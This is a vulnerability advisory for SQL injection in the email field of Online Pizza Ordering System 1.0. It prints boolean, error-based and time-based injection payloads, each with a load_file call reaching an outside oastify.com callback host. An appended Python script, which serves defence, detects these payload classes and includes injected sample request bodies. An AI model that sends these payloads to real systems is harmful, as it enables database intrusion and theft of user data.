Online Pizza Ordering System 1.0 SQL Injection
Online Pizza Ordering System version 1.0 suffers from a remote SQL injection vulnerability.
## Titles: opos-1.0 Multiple SQLi
## Author: nu11secur1ty
## Date: 06/07/2024
## Vendor: https://github.com/oretnom23
## Software: https://www.sourcecodester.com/php/16166/online-pizza-ordering-system-php-free-source-code.html
## Reference: https://portswigger.net/web-security/sql-injection

## Description:
The email parameter appears to be vulnerable to SQL injection attacks. The payload `'+(select load_file('\\\\prk350bzcbgiu65bqx3boktqahga43suvin5ht6.oastify.com\\ius'))+'` was submitted in the email parameter. This payload injects a SQL sub-query that calls MySQL's load_file function with a UNC file path that references a URL on an external domain. The application interacted with that domain, indicating that the injected SQL query was executed. The attacker can get all information from the system by using this vulnerability!

STATUS: HIGH- Vulnerability

[+]Exploits:

- SQLi Multiple:

```mysql
---
Parameter: email (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: first_name=zKwBGOrp&last_name=zKwBGOrp&mobile=zKwBGOrp&address=zKwBGOrp&[email protected]'+(select load_file('\\\\prk350bzcbgiu65bqx3boktqahga43suvin5ht6.oastify.com\\ius'))+'' AND 9762=9762 AND 'REtq'='REtq&password=e7E!x2k!U6

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: first_name=zKwBGOrp&last_name=zKwBGOrp&mobile=zKwBGOrp&address=zKwBGOrp&[email protected]'+(select load_file('\\\\prk350bzcbgiu65bqx3boktqahga43suvin5ht6.oastify.com\\ius'))+'' AND (SELECT 3595 FROM(SELECT COUNT(*),CONCAT(0x7176766a71,(SELECT(ELT(3595=3595,1))),0x71716b7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'Gtza'='Gtza&password=e7E!x2k!U6

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: first_name=zKwBGOrp&last_name=zKwBGOrp&mobile=zKwBGOrp&address=zKwBGOrp&[email protected]'+(select load_file('\\\\prk350bzcbgiu65bqx3boktqahga43suvin5ht6.oastify.com\\ius'))+'' AND (SELECT 3908 FROM (SELECT(SLEEP(7)))ddOC) AND 'ECyu'='ECyu&password=e7E!x2k!U6
---
```

## Reproduce:
[href](https://www.patreon.com/posts/opos-1-0-sqli-105752878)

## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2024/06/opos-10-multiple-sqli.html)

## Time spent:
00:19:00
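As an added, defender-side example that is not part of this advisory or of the vendor's code: a small Python check that parses a registration POST body shaped like the ones above, rejects any `email` value that is not a plain address, and reports which of the injection classes the advisory lists (out-of-band `load_file` with a UNC path, boolean tautology, FLOOR/RAND error-based, SLEEP time-based) the value matches. The request bodies are constructed for the example, the field names follow the advisory's payloads, and `collab.invalid` is a placeholder for the callback host.

```python
import re
from urllib.parse import parse_qs

# Strict shape for a registration e-mail address. A value that does not
# fullmatch this is refused before it can reach any query string.
EMAIL_RE = re.compile(r"^[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}$")

# One indicator per injection class named in the advisory. They are
# triage signals for log review, not a substitute for parameterised SQL.
INDICATORS = {
    # load_file('\\host\share...) : sub-query with a UNC path (out-of-band)
    "oob_load_file_unc": re.compile(r"load_file\s*\(\s*'\\\\", re.I),
    # AND 9762=9762  /  AND 'REtq'='REtq  : always-true comparison
    "boolean_tautology": re.compile(
        r"\band\s+(?:(\d+)\s*=\s*\1\b|'(\w+)'\s*=\s*'\2)", re.I),
    # FLOOR(RAND(0)*2) : duplicate-key error trick used by error-based payloads
    "error_based_floor_rand": re.compile(
        r"floor\s*\(\s*rand\s*\(\s*0\s*\)\s*\*\s*2\s*\)", re.I),
    # SLEEP(n) : delay used by time-based blind payloads
    "time_based_sleep": re.compile(r"\bsleep\s*\(\s*\d+\s*\)", re.I),
}


def analyze_body(body: str, field: str = "email") -> dict:
    """Parse a form-encoded POST body and assess one field.

    Returns the decoded field value, whether it passes the strict e-mail
    check, the sorted list of indicator names it matched, and a single
    'flagged' verdict (invalid shape OR any indicator hit).
    """
    params = parse_qs(body, keep_blank_values=True)
    value = params.get(field, [""])[0]
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(value))
    valid = bool(EMAIL_RE.fullmatch(value))
    return {
        "value": value,
        "valid_email": valid,
        "indicators": hits,
        "flagged": (not valid) or bool(hits),
    }


def scan_bodies(bodies: dict) -> dict:
    """Run analyze_body over a named batch of request bodies."""
    return {name: analyze_body(body) for name, body in bodies.items()}


# Constructed sample request bodies (not captured from the page's tests).
# The injected shapes mirror the advisory's three payload classes; the
# callback host is the placeholder collab.invalid.
SAMPLE_BODIES = {
    "benign": (
        "first_name=Ann&last_name=Lee&mobile=5551234&address=1+Main+St"
        "&email=ann%40example.com&password=Secret1"
    ),
    "oob_and_boolean": (
        r"first_name=a&last_name=b&mobile=c&address=d"
        r"&email=a%40example.com'+(select load_file('\\\\collab.invalid\\ius'))+''"
        r" AND 9762=9762 AND 'REtq'='REtq&password=p"
    ),
    "error_based": (
        "first_name=a&last_name=b&mobile=c&address=d"
        "&email=a%40example.com'' AND (SELECT 3595 FROM(SELECT COUNT(*),"
        "CONCAT(0x7176766a71,(SELECT(ELT(3595=3595,1))),0x71716b7671,"
        "FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)"
        " AND 'Gtza'='Gtza&password=p"
    ),
    "time_based": (
        "first_name=a&last_name=b&mobile=c&address=d"
        "&email=a%40example.com'' AND (SELECT 3908 FROM (SELECT(SLEEP(7)))ddOC)"
        " AND 'ECyu'='ECyu&password=p"
    ),
}


if __name__ == "__main__":
    for name, result in scan_bodies(SAMPLE_BODIES).items():
        verdict = "FLAGGED" if result["flagged"] else "ok"
        print(f"{name:16} {verdict:8} valid_email={result['valid_email']} "
              f"indicators={result['indicators']}")
```

The strict e-mail check alone would have refused every injected value here, which is the point: input that fails its expected shape should never be concatenated into SQL. The indicator names are there so that a flagged request in an access log can be triaged by class; the fix inside the application is a prepared statement for the registration INSERT, not a longer blocklist.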